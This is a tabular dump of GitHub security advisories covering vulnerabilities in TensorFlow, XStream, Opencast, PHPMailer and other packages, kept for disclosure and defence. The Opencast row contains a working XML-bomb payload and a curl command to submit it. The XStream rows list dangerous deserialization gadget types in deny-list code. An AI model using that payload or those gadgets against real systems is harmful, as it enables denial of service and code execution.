ecosystem stringclasses 14 values | vuln_id stringlengths 10 19 | summary stringlengths 4 267 ⌀ | details stringlengths 9 13.5k | aliases stringlengths 17 144 ⌀ | modified_date stringdate 2010-05-27 05:47:00 2022-05-10 08:46:52 | published_date stringdate 2005-12-31 05:00:00 2022-05-10 08:46:50 | severity stringclasses 5 values | score float64 0 10 ⌀ | cwe_id stringclasses 988 values | refs stringlengths 30 17.7k ⌀ | introduced stringlengths 75 4.26k ⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
GHSA | GHSA-6hpv-v2rx-c5g6 | FPE in convolutions with zero size filters | ### Impact
The [implementations for convolution operators](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/conv_ops.cc) trigger a division by 0 if passed empty filter tensor arguments.
### Patches
We have patched the issue in GitHub commit [f2c3931113eaafe9ef558faaddd48e00a6606235](https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235).
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-41209'} | 2021-11-10T19:02:17Z | 2021-11-10T19:02:17Z | MODERATE | 5.5 | {'CWE-369'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-41209', 'https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235', 'https://github.com/advisories/GHSA-6hpv-v2rx-c5g6', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hpv-v2rx-c5g6'} | null |
GHSA | GHSA-whgm-jr23-g3j9 | Uncontrolled Resource Consumption in ansi-html | This affects all versions of package ansi-html. If an attacker provides a malicious string, it will get stuck processing the input for an extremely long time. | {'CVE-2021-23424'} | 2022-04-19T19:03:26Z | 2021-09-02T17:15:24Z | HIGH | 7.5 | {'CWE-400'} | {'https://github.com/Tjatse/ansi-html/commit/8142b25bca3133ea060bcc1889277dc482327a63', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23424', 'https://github.com/Tjatse/ansi-html/issues/19', 'https://github.com/advisories/GHSA-whgm-jr23-g3j9', 'https://snyk.io/vuln/SNYK-JS-ANSIHTML-1296849', 'https://github.com/ioet/time-tracker-ui/security/advisories/GHSA-4fjc-8q3h-8r69'} | null |
GHSA | GHSA-8m9g-647g-5pxw | Infinite loop in Yubico yubihsm-connector | An issue was discovered in the /api/connector endpoint handler in Yubico yubihsm-connector before 3.0.1 (in YubiHSM SDK before 2021.04). The handler did not validate the length of the request, which can lead to a state where yubihsm-connector becomes stuck in a loop waiting for the YubiHSM to send it data, preventing any further operations until the yubihsm-connector is restarted. An attacker can send 0, 1, or 2 bytes to trigger this. | {'CVE-2021-28484'} | 2022-04-12T22:00:38Z | 2022-02-15T01:57:18Z | HIGH | 5.4 | {'CWE-835'} | {'https://github.com/Yubico/yubihsm-connector/commit/82bdf202c53460bac9106cc9b4b34a0a16cae0ed', 'https://github.com/advisories/GHSA-8m9g-647g-5pxw', 'https://nvd.nist.gov/vuln/detail/CVE-2021-28484', 'https://www.yubico.com/support/security-advisories/ysa-2021-02/', 'https://github.com/Yubico/yubihsm-connector/releases'} | null |
GHSA | GHSA-j7rm-8ww4-xx2g | Division by zero in TFLite's implementation of `SpaceToDepth` | ### Impact
The `Prepare` step of the `SpaceToDepth` TFLite operator [does not check for 0 before division](https://github.com/tensorflow/tensorflow/blob/5f7975d09eac0f10ed8a17dbb6f5964977725adc/tensorflow/lite/kernels/space_to_depth.cc#L63-L67).
```cc
const int block_size = params->block_size;
const int input_height = input->dims->data[1];
const int input_width = input->dims->data[2];
int output_height = input_height / block_size;
int output_width = input_width / block_size;
```
An attacker can craft a model such that `params->block_size` would be zero.
### Patches
We have patched the issue in GitHub commit [0d45ea1ca641b21b73bcf9c00e0179cda284e7e7](https://github.com/tensorflow/tensorflow/commit/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7).
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.
### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
### Attribution
This vulnerability has been reported by members of the Aivul Team from Qihoo 360. | {'CVE-2021-29587'} | 2021-05-21T14:26:45Z | 2021-05-21T14:26:45Z | LOW | 2.5 | {'CWE-369'} | {'https://github.com/advisories/GHSA-j7rm-8ww4-xx2g', 'https://github.com/tensorflow/tensorflow/commit/0d45ea1ca641b21b73bcf9c00e0179cda284e7e7', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j7rm-8ww4-xx2g', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29587'} | null |
GHSA | GHSA-7qcx-jmrc-h2rr | Cross-Site Scripting in keystone | Versions of `keystone` prior to 4.0.0 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize user input on the `Contact Us` page, allowing attackers to submit contact forms with malicious JavaScript in the message field. The output is not properly encoded leading an admin that opens new inquiry to execute the arbitrary JavaScript supplied in their browser.
## Recommendation
Update to version 4.0.0 or later. | {'CVE-2017-15878'} | 2021-09-03T21:41:16Z | 2017-11-15T19:44:16Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-7qcx-jmrc-h2rr', 'https://www.npmjs.com/advisories/980', 'https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf', 'https://www.exploit-db.com/exploits/43054/', 'http://www.securityfocus.com/bid/101541', 'https://github.com/keystonejs/keystone/pull/4478', 'https://packetstormsecurity.com/files/144756/KeystoneJS-4.0.0-beta.5-Unauthenticated-Stored-Cross-Site-Scripting.html', 'http://blog.securelayer7.net/keystonejs-open-source-penetration-testing-report/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15878'} | null |
GHSA | GHSA-9gwx-9cwp-5c2m | Billion laughs attack (XML bomb) | ### Impact
Opencast is vulnerable to the [Billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request.
Consider an XML file (`createMediaPackage.xml`) like this:
```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE lolz [
<!ENTITY lol "Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum. ">
<!ELEMENT title (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<mediapackage xmlns="http://mediapackage.opencastproject.org" id="d162d5b2-b54f-4400-a268-ee6565b0e6e7" start="2020-01-23T23:08:37Z">
<title>&lol5;</title>
<media/>
<metadata/>
<attachments/>
<publications/>
</mediapackage>
```
Throwing this at Opencast will cause Opencast to parse the XML and expand the Lorem Ipsum about 100 000 times, instantly consuming a huge amount of memory:
```sh
curl -i -u admin:opencast https://develop.opencast.org/ingestdownload/ingestdownload \
-F 'mediapackage=<createMediaPackage.xml' \
-F sourceFlavors="" \
-F sourceTags="" \
-F deleteExternal="" \
-F tagsAndFlavor='' \
-o out.xml
```
Additional notes:
- You can likely use other endpoints accepting XML (this was just the first one I tried) and depending on how much memory you want to consume, you might want to enlarge the lorem ipsum text.
- Opencast's XML parser does limit the expansion to 100 000 times, already limiting the attack. Nevertheless, this can already harm the system.
- To exploit this, users need to have ingest privileges, limiting the group of potential attackers
### Patches
The problem has been fixed in Opencast 9.6. Older versions of Opencast are not patched sue to the extent of this patch.
### Workarounds
There is no known workaround for this issue.
### References
- [Billion laughs attack explained](https://en.wikipedia.org/wiki/Billion_laughs_attack)
- For technical details, take a look at the patch fixing the issue: https://github.com/opencast/opencast/commit/_________
### For more information
If you have any questions or comments about this advisory:
- Open an issue in [our issue tracker](https://github.com/opencast/opencast/issues)
- Email us at [security@opencast.org](mailto:security@opencast.org) | {'CVE-2021-32623'} | 2022-04-19T19:02:58Z | 2021-06-17T20:11:35Z | HIGH | 8.1 | {'CWE-776'} | {'https://github.com/opencast/opencast/commit/16b0d641713fe31b8518fcf14fc5e4e815d81206', 'https://github.com/opencast/opencast/commit/8ae27da5a6f658011a5741b3210e715b0dc6213e', 'https://github.com/opencast/opencast/security/advisories/GHSA-9gwx-9cwp-5c2m', 'https://github.com/advisories/GHSA-9gwx-9cwp-5c2m', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32623'} | null |
GHSA | GHSA-2q8x-2p7f-574v | XStream is vulnerable to an Arbitrary Code Execution attack | ### Impact
The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
### Patches
XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
### Workarounds
See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
### References
See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39153](https://x-stream.github.io/CVE-2021-39153.html).
### Credits
Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)
| {'CVE-2021-39153'} | 2022-04-22T15:42:36Z | 2021-08-25T14:46:49Z | HIGH | 8.5 | {'CWE-502'} | {'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'https://github.com/advisories/GHSA-2q8x-2p7f-574v', 'https://www.debian.org/security/2021/dsa-5004', 'https://x-stream.github.io/CVE-2021-39153.html', 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html', 'https://github.com/x-stream/xstream/security/advisories/GHSA-2q8x-2p7f-574v', 'https://security.netapp.com/advisory/ntap-20210923-0003/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-39153', 'https://www.oracle.com/security-alerts/cpujan2022.html'} | null |
GHSA | GHSA-m553-9wmx-533h | Cross-site scripting in Dolibarr | In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. | {'CVE-2019-16197'} | 2021-08-18T19:24:27Z | 2019-11-08T20:05:31Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/Dolibarr/dolibarr/commit/c53be23122fc6e7c3c8d65ee8ba979c566380964', 'https://github.com/advisories/GHSA-m553-9wmx-533h', 'https://nvd.nist.gov/vuln/detail/CVE-2019-16197', 'http://packetstormsecurity.com/files/154481/Dolibarr-ERP-CRM-10.0.1-Cross-Site-Scripting.html'} | null |
GHSA | GHSA-2v2v-fx7r-f2fh | pimcore is vulnerable to Cross-Site Request Forgery (CSRF) | pimcore is vulnerable to Cross-Site Request Forgery (CSRF) | {'CVE-2021-4082'} | 2021-12-16T14:28:10Z | 2021-12-16T14:28:10Z | MODERATE | 4.3 | {'CWE-352'} | {'https://github.com/advisories/GHSA-2v2v-fx7r-f2fh', 'https://huntr.dev/bounties/81838575-e170-41fb-b451-92c1c8aab092', 'https://github.com/pimcore/pimcore/commit/3088cec7dc3cbc5a8b26f1269e398e799ee7ee28', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4082'} | null |
GHSA | GHSA-wv67-9jq7-8r69 | Improper Input Validation and Buffer Over-read in mqtt-packet | A specifically malformed MQTT Subscribe packet crashes MQTT Brokers using the mqtt-packet module versions < 3.5.1, 4.0.0 - 4.1.3, 5.0.0 - 5.6.1, 6.0.0 - 6.1.2 for decoding. | {'CVE-2019-5432'} | 2021-11-04T17:08:34Z | 2019-05-14T04:02:45Z | HIGH | 7.5 | {'CWE-126', 'CWE-125'} | {'https://hackerone.com/reports/541354', 'https://github.com/advisories/GHSA-wv67-9jq7-8r69', 'https://nvd.nist.gov/vuln/detail/CVE-2019-5432'} | null |
GHSA | GHSA-xgx2-332h-9x6q | SQL Injection in Yeswiki | An SQL Injection vlnerability exits in Yeswiki doryphore 20211012 via the email parameter in the registration form. The issue was fixed in Yeswiki version 4.1.0. | {'CVE-2021-43091'} | 2022-04-05T20:54:58Z | 2022-03-26T00:00:32Z | HIGH | 7.5 | {'CWE-89'} | {'https://github.com/yeswiki/yeswiki/commit/c9785f9a92744c3475f9676a0d8f95de24750094', 'https://huntr.dev/bounties/07f245a7-ee9f-4b55-a0cc-13d5cb1be6e0/', 'https://nvd.nist.gov/vuln/detail/CVE-2021-43091', 'https://github.com/advisories/GHSA-xgx2-332h-9x6q'} | null |
GHSA | GHSA-689x-x68p-fph3 | Cross-site Scripting in vditor | Cross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.13. | {'CVE-2022-0350'} | 2022-04-12T21:57:07Z | 2022-04-01T00:00:41Z | MODERATE | 5.4 | {'CWE-79'} | {'https://huntr.dev/bounties/8202aa06-4b49-45ff-aa0f-00982f62005c', 'https://github.com/vanessa219/vditor/commit/e912e36ea98251d700499b1ac7702708d3398476', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0350', 'https://github.com/advisories/GHSA-689x-x68p-fph3'} | null |
GHSA | GHSA-jfvx-7wrx-43fh | XStream vulnerable to an Arbitrary File Deletion on the local host when unmarshalling | ### Impact
The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing process has sufficient rights only by manipulating the processed input stream.
### Patches
If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.15.
### Workarounds
The reported vulnerability does only exist with a JAX-WS runtime on the classpath.
No user is affected, who followed the recommendation to setup XStream's Security Framework with a whitelist! Anyone relying on XStream's default blacklist can immediately switch to a whilelist for the allowed types to avoid the vulnerability.
Users of XStream 1.4.14 or below who still insist to use XStream default blacklist - despite that clear recommendation - can use a workaround depending on their version in use.
Users of XStream 1.4.14 can simply add two lines to XStream's setup code:
```Java
xstream.denyTypes(new String[]{ "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.14 to 1.4.13 can simply add three lines to XStream's setup code:
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.12 to 1.4.7 who want to use XStream with a black list will have to setup such a list from scratch and deny at least the following types: _javax.imageio.ImageIO$ContainsFilter_, _java.beans.EventHandler_, _java.lang.ProcessBuilder_, _jdk.nashorn.internal.objects.NativeString.class_, _java.lang.Void_ and _void_ and deny several types by name pattern.
```Java
xstream.denyTypes(new String[]{ "javax.imageio.ImageIO$ContainsFilter", "jdk.nashorn.internal.objects.NativeString" });
xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, "jdk.nashorn.internal.objects.NativeString", java.beans.EventHandler.class, java.lang.ProcessBuilder.class, java.lang.Void.class, void.class });
xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..*", ".*\\.ReadAllStream\\$FileStream" });
```
Users of XStream 1.4.6 or below can register an own converter to prevent the unmarshalling of the currently know critical types of the Java runtime. It is in fact an updated version of the workaround for CVE-2013-7285:
```Java
xstream.registerConverter(new Converter() {
public boolean canConvert(Class type) {
return type != null && (type == java.beans.EventHandler.class || type == java.lang.ProcessBuilder.class
|| type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
|| type == java.lang.Void.class || void.class || Proxy.isProxy(type))
|| type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
}, XStream.PRIORITY_LOW);
```
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) | {'CVE-2020-26259'} | 2021-11-18T15:24:50Z | 2020-12-21T16:28:26Z | MODERATE | 6.8 | {'CWE-78'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/', 'https://x-stream.github.io/CVE-2020-26259.html', 'https://github.com/advisories/GHSA-jfvx-7wrx-43fh', 'https://lists.debian.org/debian-lts-announce/2020/12/msg00042.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26259', 'https://www.debian.org/security/2021/dsa-4828', 'https://github.com/x-stream/xstream/security/advisories/GHSA-jfvx-7wrx-43fh', 'https://security.netapp.com/advisory/ntap-20210409-0005/', 'https://lists.apache.org/thread.html/r97993e3d78e1f5389b7b172ba9f308440830ce5f051ee62714a0aa34@%3Ccommits.struts.apache.org%3E'} | null |
GHSA | GHSA-73qw-ww62-m54x | Critical severity vulnerability that affects colorscore | The initialize method in the Histogram class in lib/colorscore/histogram.rb in the colorscore gem before 0.0.5 for Ruby allows context-dependent attackers to execute arbitrary code via shell metacharacters in the (1) image_path, (2) colors, or (3) depth variable. | {'CVE-2015-7541'} | 2021-09-02T19:21:06Z | 2017-10-24T18:33:36Z | CRITICAL | 10 | {'CWE-77'} | {'https://github.com/quadule/colorscore/commit/570b5e854cecddd44d2047c44126aed951b61718', 'http://rubysec.com/advisories/CVE-2015-7541/', 'http://www.openwall.com/lists/oss-security/2016/01/05/2', 'https://github.com/advisories/GHSA-73qw-ww62-m54x', 'https://nvd.nist.gov/vuln/detail/CVE-2015-7541'} | null |
GHSA | GHSA-hm3x-jwwf-jpr9 | Exposure of Sensitive Information to an Unauthorized Actor in OpenStack tripleo-heat-templates | An information exposure flaw in openstack-tripleo-heat-templates allows an external user to discover the internal IP or hostname. An attacker could exploit this by checking the `www_authenticate_uri parameter` (which is visible to all end users) in configuration files. This would give sensitive information which may aid in additional system exploitation. A patch is available on the `master` branch and anticipated to be part of version 11.6.1. | {'CVE-2021-4180'} | 2022-04-05T20:53:00Z | 2022-03-24T00:00:17Z | MODERATE | 4.3 | {'CWE-200'} | {'https://github.com/advisories/GHSA-hm3x-jwwf-jpr9', 'https://bugs.launchpad.net/tripleo/+bug/1955397', 'https://github.com/openstack/tripleo-heat-templates/commit/2b9461e97fc5c4ceb0848d1cc4484f656bb85515', 'https://github.com/openstack/tripleo-heat-templates/commit/160936df134a471cfd245bd60964046027a571ea', 'https://nvd.nist.gov/vuln/detail/CVE-2021-4180', 'https://bugzilla.redhat.com/show_bug.cgi?id=2035793'} | null |
GHSA | GHSA-7w4p-72j7-v7c2 | Phar object injection in PHPMailer | PHPMailer versions prior to 6.0.6 and 5.2.27 are vulnerable to an object injection attack by passing phar:// paths into `addAttachment()` and other functions that may receive unfiltered local paths, possibly leading to RCE. See [this article](https://knasmueller.net/5-answers-about-php-phar-exploitation) for more info on this type of vulnerability. Mitigated by blocking the use of paths containing URL-protocol style prefixes such as `phar://`. Reported by Sehun Oh of cyberone.kr.
### Impact
Object injection, possible remote code execution
### Patches
Fixed in 6.0.6 and 5.2.27
### Workarounds
Validate and sanitise user input before using.
### References
https://nvd.nist.gov/vuln/detail/CVE-2018-19296
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer) | {'CVE-2018-19296'} | 2021-08-19T19:57:59Z | 2020-03-05T22:08:55Z | HIGH | 8.8 | {'CWE-502', 'CWE-915'} | {'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KPU66INRFY5BQ3ESVPRUXJR4DXQAFJVT/', 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-7w4p-72j7-v7c2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3B5WDPGUFNPG4NAZ6G4BZX43BKLAVA5B/', 'https://nvd.nist.gov/vuln/detail/CVE-2018-19296', 'https://github.com/PHPMailer/PHPMailer/releases/tag/v6.0.6', 'https://lists.debian.org/debian-lts-announce/2018/12/msg00020.html', 'https://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.27', 'https://www.debian.org/security/2018/dsa-4351', 'https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2018-19296.yaml', 'https://github.com/advisories/GHSA-7w4p-72j7-v7c2'} | null |
GHSA | GHSA-3w9q-c44j-37jj | High severity vulnerability that affects Microsoft.ChakraCore | A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0609, CVE-2019-0639, CVE-2019-0680, CVE-2019-0769, CVE-2019-0770, CVE-2019-0771, CVE-2019-0783. | {'CVE-2019-0773'} | 2021-08-31T21:35:33Z | 2019-04-09T19:43:32Z | HIGH | 7.5 | {'CWE-787'} | {'https://github.com/advisories/GHSA-3w9q-c44j-37jj', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0773', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0773'} | null |
GHSA | GHSA-wgpj-7c2j-vfjm | Tampering with links (e.g. password reset) in emails sent by Indico | ### Impact
An external audit of the Indico codebase has discovered a vulnerability in Indico's URL generation logic which could have allowed an attacker to make Indico send a password reset link with a valid token pointing to an attacker-controlled domain by sending that domain in the `Host` header. Had a user clicked such a link without realizing it does not point to Indico (and that they never requested it), it would have revealed their password reset token to the attacker, allowing them to reset the password for that user and thus take over their Indico account.
- If the web server already enforces a canonical host name, this cannot be exploited (this was not part of the default config from the Indico setup guide)
- If only SSO is used ([`LOCAL_IDENTITIES`](https://docs.getindico.io/en/stable/config/settings/#LOCAL_IDENTITIES) set to `False`), the vulnerability cannot be exploited for password reset links, but other links in emails set by Indico could be tampered with in the same way (with less problematic impact though)
### Patches
You need to update to [Indico 2.3.4](https://github.com/indico/indico/releases/tag/v2.3.4) as soon as possible.
See [the docs](https://docs.getindico.io/en/stable/installation/upgrade/) for instructions on how to update.
### Workarounds
You can configure the web server to canonicalize the URL to the hostname used for Indico. See [this commit](https://github.com/indico/indico/pull/4815/commits/b6bff6d004abcf07db1891e26a0eb4aa0edb7c21) for the changes in our setup docs; they can be easily applied to your existing web server config.
### For more information
If you have any questions or comments about this advisory:
- Open a thread in [our forum](https://talk.getindico.io/)
- Email us privately at indico-team@cern.ch | {'CVE-2021-30185'} | 2021-04-16T23:11:42Z | 2021-04-08T16:33:38Z | HIGH | 0 | {'CWE-640'} | {'https://github.com/indico/indico/security/advisories/GHSA-wgpj-7c2j-vfjm', 'https://github.com/indico/indico/releases/tag/v2.3.4', 'https://www.shorebreaksecurity.com/blog/', 'https://github.com/advisories/GHSA-wgpj-7c2j-vfjm', 'https://nvd.nist.gov/vuln/detail/CVE-2021-30185'} | null |
GHSA | GHSA-4jj4-m52p-8rx3 | Prototype pollution in set-object-value | Prototype pollution vulnerability in 'set-object-value' versions 0.0.0 through 0.0.5 allows an attacker to cause a denial of service and may lead to remote code execution. | {'CVE-2020-28281'} | 2021-04-13T15:24:08Z | 2021-04-13T15:24:08Z | CRITICAL | 9.8 | {'CWE-1321'} | {'https://github.com/advisories/GHSA-4jj4-m52p-8rx3', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28281', 'https://github.com/react-atomic/react-atomic-organism/blob/e5645a2f9e632ffdebc83d720498831e09754c22/packages/lib/set-object-value/src/index.js#L16', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28281'} | null |
GHSA | GHSA-h59f-p56g-g75v | SQL Injection in librenms | A second-order SQL injection issue in Widgets/TopDevicesController.php (aka the Top Devices dashboard widget) of LibreNMS before 21.1.0 allows remote authenticated attackers to execute arbitrary SQL commands via the sort_order parameter against the /ajax/form/widget-settings endpoint. | {'CVE-2020-35700'} | 2021-05-06T18:53:02Z | 2021-05-06T18:53:02Z | HIGH | 8.8 | {'CWE-89'} | {'https://github.com/librenms/librenms/releases/tag/21.1.0', 'https://www.horizon3.ai/disclosures/librenms-second-order-sqli', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35700', 'https://github.com/librenms/librenms/issues/12405', 'https://github.com/advisories/GHSA-h59f-p56g-g75v', 'https://github.com/librenms/librenms/pull/12422', 'https://github.com/librenms/librenms/blob/master/app/Http/Controllers/Widgets/TopDevicesController.php'} | null |
GHSA | GHSA-j87c-cj65-vmh5 | High severity vulnerability that affects rendertron | Rendertron 1.0.0 allows for alternative protocols such as 'file://' introducing a Local File Inclusion (LFI) bug where arbitrary files can be read by a remote attacker. | {'CVE-2017-18354'} | 2021-09-14T19:19:11Z | 2019-01-04T17:41:51Z | HIGH | 7.5 | {'CWE-22'} | {'https://bugs.chromium.org/p/chromium/issues/detail?id=759111', 'https://github.com/GoogleChrome/rendertron/pull/88', 'https://github.com/advisories/GHSA-j87c-cj65-vmh5', 'https://github.com/GoogleChrome/rendertron/commit/8d70628c96ae72eff6eebb451d26fc9ed6b58b0e', 'https://nvd.nist.gov/vuln/detail/CVE-2017-18354'} | null |
GHSA | GHSA-m8xh-cqc2-5q6f | Type Confusion in ImpressCMS | ImpressCMS before 1.4.3 has plugins/preloads/autologin.php type confusion with resultant Authentication Bypass (!= instead of !==). | {'CVE-2021-26600'} | 2022-04-05T21:19:47Z | 2022-03-29T00:01:16Z | CRITICAL | 9.8 | {'CWE-843'} | {'http://packetstormsecurity.com/files/166393/ImpressCMS-1.4.2-Authentication-Bypass.html', 'https://hackerone.com/reports/1081986', 'https://github.com/advisories/GHSA-m8xh-cqc2-5q6f', 'http://seclists.org/fulldisclosure/2022/Mar/43', 'http://karmainsecurity.com/KIS-2022-01', 'https://nvd.nist.gov/vuln/detail/CVE-2021-26600', 'https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3'} | null |
GHSA | GHSA-78p3-96hc-3j47 | Malicious Package in jquery-airload | Version 0.2.5 of `jquery-airload` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
Remove the package from your environment. It's also recommended to evaluate your application to determine whether or not user data was compromised. | null | 2020-09-03T19:11:17Z | 2020-09-03T19:11:17Z | CRITICAL | 0 | null | {'https://github.com/advisories/GHSA-78p3-96hc-3j47', 'https://www.npmjs.com/advisories/1102'} | null |
GHSA | GHSA-jmm9-2p29-vh2w | High severity vulnerability that affects activerecord | Ruby on Rails 3.0.x before 3.0.4 does not ensure that arguments to the limit function specify integer values, which makes it easier for remote attackers to conduct SQL injection attacks via a non-numeric argument. | {'CVE-2011-0448'} | 2021-09-14T19:49:45Z | 2017-10-24T18:33:38Z | HIGH | 0 | {'CWE-89'} | {'http://groups.google.com/group/rubyonrails-security/msg/4e19864cf6ad40ad?dmode=source&output=gplain', 'https://github.com/advisories/GHSA-jmm9-2p29-vh2w', 'http://www.vupen.com/english/advisories/2011/0877', 'http://securitytracker.com/id?1025063', 'http://lists.fedoraproject.org/pipermail/package-announce/2011-April/057650.html', 'https://nvd.nist.gov/vuln/detail/CVE-2011-0448', 'http://secunia.com/advisories/43278', 'http://weblog.rubyonrails.org/2011/2/8/new-releases-2-3-11-and-3-0-4'} | null |
